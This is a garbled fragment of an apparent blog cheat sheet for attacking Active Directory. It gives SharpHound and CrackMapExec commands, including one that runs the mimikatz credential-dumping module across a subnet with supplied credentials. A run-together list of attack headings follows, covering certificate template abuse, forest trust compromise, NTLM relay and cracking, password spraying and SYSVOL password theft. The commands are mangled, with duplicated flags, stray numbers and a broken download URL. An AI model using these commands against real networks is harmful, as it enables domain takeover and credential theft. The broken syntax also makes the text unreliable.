\ SharpHound.exe -c all -d active.htb -searchforest # run the collector on the machine using SharpHound.exe # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe Root cme mimikatz -server http -server -port 80 14.0 / 24 -u user -p 'Password ' -local -auth -M mimikatz Root cme smb -M name_module -o VAR = DATA Root wget https: // /byt3bl33d3r /CrackMapExec /releases /download /v5. # use the latest release, CME is now a binary packaged will all its dependencies
MS-EFSRPC Abuse with Unconstrained Delegation.SpoolService Abuse with Unconstrained Delegation.
Privileged Access Management (PAM) Trust.Forest to Forest Compromise - Trust Ticket.Child Domain to Forest Compromise - SID Hijacking.GenericWrite and Remote Connection Manager.ESC7 - Vulnerable Certificate Authority Access Control.ESC3 - Misconfigured Enrollment Agent Templates.ESC2 - Misconfigured Certificate Templates.ESC1 - Misconfigured Certificate Templates.DNS Poisonning - Relay delegation with mitm6.Capturing and cracking Net-NTLMv2/NTLMv2 hashes.Capturing and cracking Net-NTLMv1/NTLMv1 hashes.Password of Pre-Created Computer Account.Spray passwords against the RDP service.Passwords in SYSVOL & Group Policy Preferences.SCF and URL file attack against writeable share.
0 kommentar(er)
